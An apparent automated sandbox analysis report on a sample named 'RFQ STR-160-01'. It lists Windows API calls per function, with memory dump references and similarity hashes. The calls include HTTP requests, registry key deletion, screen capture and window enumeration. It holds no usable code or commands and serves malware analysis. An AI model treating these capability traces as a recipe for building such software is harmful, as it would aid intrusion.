              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
              • String ID:
              • API String ID: 2178637699-0
              • Opcode ID: 802ecb8a72dd9a9a4fc0dba367411173bb76d8f820f529164767d8259785bdc6
              • Instruction ID: da8662ed81ac62bf71843f234efa2c4b6aea54158d013e169f3dc1c384bd87a8
              • Opcode Fuzzy Hash: 802ecb8a72dd9a9a4fc0dba367411173bb76d8f820f529164767d8259785bdc6
              • Instruction Fuzzy Hash: D9F18C315083419FDB24EF24C895BAEBBE6BF85310F18855DF4958B2A2DB31EC45CB52
              APIs
              • GetMenuItemCount.USER32(00661990), ref: 005D2F8D
              • GetMenuItemCount.USER32(00661990), ref: 005D303D
              • GetCursorPos.USER32(?), ref: 005D3081
              • SetForegroundWindow.USER32(00000000), ref: 005D308A
              • TrackPopupMenuEx.USER32(00661990,00000000,?,00000000,00000000,00000000), ref: 005D309D
              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005D30A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
              • String ID: 0
              • API String ID: 36266755-4108050209
              • Opcode ID: eb2f579ec46729b19681de17b3cbfb54b518539887af6f79c90803dfba143d57
              • Instruction ID: 63c7be68607026fff1a2f1cb37b05d12d1879e67edaccd97c18c09968db800de
              • Opcode Fuzzy Hash: eb2f579ec46729b19681de17b3cbfb54b518539887af6f79c90803dfba143d57
              • Instruction Fuzzy Hash: FD71E571644206BAEB318F68CC49FAABF69FF45364F204217F515AA2E0C7B1A910DB91
              APIs
              • DestroyWindow.USER32(?,?), ref: 00626DEB
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00626E5F
              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00626E81
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626E94
              • DestroyWindow.USER32(?), ref: 00626EB5
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00590000,00000000), ref: 00626EE4
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626EFD
              • GetDesktopWindow.USER32 ref: 00626F16
              • GetWindowRect.USER32(00000000), ref: 00626F1D
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00626F35
              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00626F4D
                • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
              • String ID: 0$tooltips_class32
              • API String ID: 2429346358-3619404913
              • Opcode ID: b3f8a4fa57887dd5b262e7ca736065d0cb26f420e4d5aa90a6443109e6e59b72
              • Instruction ID: 61f65487fe06fc13504f4d3940753a20cfba44430f50a59be91f269cdf84479c
              • Opcode Fuzzy Hash: b3f8a4fa57887dd5b262e7ca736065d0cb26f420e4d5aa90a6443109e6e59b72
              • Instruction Fuzzy Hash: A9716674104645AFDB21CF18EC48FAABBFAFB89314F18451DF98997261C770A90ACF12
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C4B0
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C4C3
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C4D7
              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0060C4F0
              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0060C533
              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0060C549
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C554
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C584
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C5DC
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C5F0
              • InternetCloseHandle.WININET(00000000), ref: 0060C5FB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
              • String ID:
              • API String ID: 3800310941-3916222277
              • Opcode ID: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
              • Instruction ID: 364fb42bd341d61e0b8ba9e76fd4e44e90921ed237584f1b2636c97b0b1a5105
              • Opcode Fuzzy Hash: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
              • Instruction Fuzzy Hash: DD518EB4540604BFDB368F60CD48AAB7BFEFF08364F004619F94596290DB30E915DBA0
              APIs
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00628592
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285A2
              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285AD
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285BA
              • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285C8
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285D7
              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285E0
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285E7
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006285F8
              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0062FC38,?), ref: 00628611
              • GlobalFree.KERNEL32(00000000), ref: 00628621
              • GetObjectW.GDI32(?,00000018,?), ref: 00628641
              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00628671
              • DeleteObject.GDI32(?), ref: 00628699
              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006286AF
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
              • String ID:
              • API String ID: 3840717409-0
              • Opcode ID: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
              • Instruction ID: c91e0c96a2a0ca32de153ddc38e8d9e712759003762e621cf9941a948fb959e0
              • Opcode Fuzzy Hash: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
              • Instruction Fuzzy Hash: 2141FC75601615AFDB21DF65DC48EAE7BBAEF89761F104058F905E7250DB30AA02CF60
              APIs
              • VariantInit.OLEAUT32(00000000), ref: 00601502
              • VariantCopy.OLEAUT32(?,?), ref: 0060150B
              • VariantClear.OLEAUT32(?), ref: 00601517
              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006015FB
              • VarR8FromDec.OLEAUT32(?,?), ref: 00601657
              • VariantInit.OLEAUT32(?), ref: 00601708
              • SysFreeString.OLEAUT32(?), ref: 0060178C
              • VariantClear.OLEAUT32(?), ref: 006017D8
              • VariantClear.OLEAUT32(?), ref: 006017E7
              • VariantInit.OLEAUT32(00000000), ref: 00601823
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
              • String ID: %4d%02d%02d%02d%02d%02d$Default
              • API String ID: 1234038744-3931177956
              • Opcode ID: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
              • Instruction ID: 93ed0f4c43fd6a8796f4425e39b349d1a43955f77043864314725430ea73e60e
              • Opcode Fuzzy Hash: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
              • Instruction Fuzzy Hash: FAD118B1A40506DBDB199F64D889BBEBBB6BF86700F10805AF4069F2C0DB30DC46DB61
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061B6F4
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061B772
              • RegDeleteValueW.ADVAPI32(?,?), ref: 0061B80A
              • RegCloseKey.ADVAPI32(?), ref: 0061B87E
              • RegCloseKey.ADVAPI32(?), ref: 0061B89C
              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0061B8F2
              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061B904
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061B922
              • FreeLibrary.KERNEL32(00000000), ref: 0061B983
              • RegCloseKey.ADVAPI32(00000000), ref: 0061B994
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 146587525-4033151799
              • Opcode ID: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
              • Instruction ID: 7fa150cbfe4cca87347df064fc1d0afcd6b6c1e7a83e753a5b595b6c77360c48
              • Opcode Fuzzy Hash: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
              • Instruction Fuzzy Hash: F5C17031204202AFD710DF24C495FAABBE6BF85318F18955CF45A4B3A2CB75ED86CB91
              APIs
              • GetDC.USER32(00000000), ref: 006125D8
              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006125E8
              • CreateCompatibleDC.GDI32(?), ref: 006125F4
              • SelectObject.GDI32(00000000,?), ref: 00612601
              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0061266D
              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006126AC
              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006126D0
              • SelectObject.GDI32(?,?), ref: 006126D8
              • DeleteObject.GDI32(?), ref: 006126E1
              • DeleteDC.GDI32(?), ref: 006126E8
              • ReleaseDC.USER32(00000000,?), ref: 006126F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
              • String ID: (
              • API String ID: 2598888154-3887548279
              • Opcode ID: 6ab07f9be35f11ab2a1a8c48a80a197cfcbca24906af31d33e6371975dfef011
              • Instruction ID: 0567dcb9497614b6b5015656793c0e1f120ff8241df2a09374f25998400afa00
              • Opcode Fuzzy Hash: 6ab07f9be35f11ab2a1a8c48a80a197cfcbca24906af31d33e6371975dfef011
              • Instruction Fuzzy Hash: FE610275D0021AEFCF14CFA4D885AAEBBF6FF48310F248529E955A7250D730A951CFA4
              APIs
              • ___free_lconv_mon.LIBCMT ref: 005CDAA1
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD659
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD66B
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD67D
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD68F
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6A1
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6B3
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6C5
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6D7
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6E9
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6FB
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD70D
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD71F
                • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD731
              • _free.LIBCMT ref: 005CDA96
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005CDAB8
              • _free.LIBCMT ref: 005CDACD
              • _free.LIBCMT ref: 005CDAD8
              • _free.LIBCMT ref: 005CDAFA
              • _free.LIBCMT ref: 005CDB0D
              • _free.LIBCMT ref: 005CDB1B
              • _free.LIBCMT ref: 005CDB26
              • _free.LIBCMT ref: 005CDB5E
              • _free.LIBCMT ref: 005CDB65
              • _free.LIBCMT ref: 005CDB82
              • _free.LIBCMT ref: 005CDB9A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
              • Instruction ID: a23ae44a02533aaf8df29e70ad1b5493e994412dbab989d08e7f27661db10db5
              • Opcode Fuzzy Hash: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
              • Instruction Fuzzy Hash: 183117316046069FEB21AAB9EC49F5ABFE9FF40325F15442DE449D7191DA35AC808B30
              APIs
              • GetClassNameW.USER32(?,?,00000100), ref: 005F369C
              • _wcslen.LIBCMT ref: 005F36A7
              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005F3797
              • GetClassNameW.USER32(?,?,00000400), ref: 005F380C
              • GetDlgCtrlID.USER32(?), ref: 005F385D
              • GetWindowRect.USER32(?,?), ref: 005F3882
              • GetParent.USER32(?), ref: 005F38A0
              • ScreenToClient.USER32(00000000), ref: 005F38A7
              • GetClassNameW.USER32(?,?,00000100), ref: 005F3921
              • GetWindowTextW.USER32(?,?,00000400), ref: 005F395D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
              • String ID: %s%u
              • API String ID: 4010501982-679674701
              • Opcode ID: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
              • Instruction ID: bab4b2c8c9f82ff3e480f9149d9d06ab5993d599416d2fa44437bb27aa66fe10
              • Opcode Fuzzy Hash: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
              • Instruction Fuzzy Hash: 4691D77120560AAFE719DF24C885FFAFBA9FF44350F004519FA99C2190DB78EA45CB91
              APIs
              • GetClassNameW.USER32(?,?,00000400), ref: 005F4994
              • GetWindowTextW.USER32(?,?,00000400), ref: 005F49DA
              • _wcslen.LIBCMT ref: 005F49EB
              • CharUpperBuffW.USER32(?,00000000), ref: 005F49F7
              • _wcsstr.LIBVCRUNTIME ref: 005F4A2C
              • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4A64
              • GetWindowTextW.USER32(?,?,00000400), ref: 005F4A9D
              • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4AE6
              • GetClassNameW.USER32(?,?,00000400), ref: 005F4B20
              • GetWindowRect.USER32(?,?), ref: 005F4B8B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
              • String ID: ThumbnailClass
              • API String ID: 1311036022-1241985126
              • Opcode ID: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
              • Instruction ID: 44075fc8164f928a387ffaa2db2858e867ea7fc4c7324f28f5214a396115260f
              • Opcode Fuzzy Hash: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
              • Instruction Fuzzy Hash: 64919C3110420A9FDB14CF14C985BBB7BA9FF84354F048469FE859A096EB38ED45CFA1
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00628D5A
              • GetFocus.USER32 ref: 00628D6A
              • GetDlgCtrlID.USER32(00000000), ref: 00628D75
              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00628E1D
              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00628ECF
              • GetMenuItemCount.USER32(?), ref: 00628EEC
              • GetMenuItemID.USER32(?,00000000), ref: 00628EFC
              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00628F2E
              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00628F70
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00628FA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
              • String ID: 0
              • API String ID: 1026556194-4108050209
              • Opcode ID: 4008836531e891a0b87385d8b03fd941d41db298dbddfa3bd36cd4b1b2d34442
              • Instruction ID: 207f764cfc9370a6ca9cad612c3459609dbbb076521ba6ef67299783e64cd6c5
              • Opcode Fuzzy Hash: 4008836531e891a0b87385d8b03fd941d41db298dbddfa3bd36cd4b1b2d34442
              • Instruction Fuzzy Hash: 2C819C715097219FD720CF24ED84AAB7BEAFF88354F040919F984A7291DB70D905CFA2
              APIs
              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005FDC20
              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005FDC46
              • _wcslen.LIBCMT ref: 005FDC50
              • _wcsstr.LIBVCRUNTIME ref: 005FDCA0
              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005FDCBC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
              • API String ID: 1939486746-1459072770
              • Opcode ID: 20e217c6eb87377a3e940eda4c40a98292d80ad1e837cee5d5d7995b1221e697
              • Instruction ID: 5a4eb1016fb31cb47db73bc78685b615c500835ecb4dc20008957c8f2fb8e830
              • Opcode Fuzzy Hash: 20e217c6eb87377a3e940eda4c40a98292d80ad1e837cee5d5d7995b1221e697
              • Instruction Fuzzy Hash: 6441083254060A7ADB14A764DC4BEFF7FBDFF96750F100169FA00E6182EA74A9019BB4
              APIs
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CC64
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0061CC8D
              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD48
                • Part of subcall function 0061CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0061CCAA
                • Part of subcall function 0061CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0061CCBD
                • Part of subcall function 0061CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061CCCF
                • Part of subcall function 0061CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD05
                • Part of subcall function 0061CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CD28
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061CCF3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
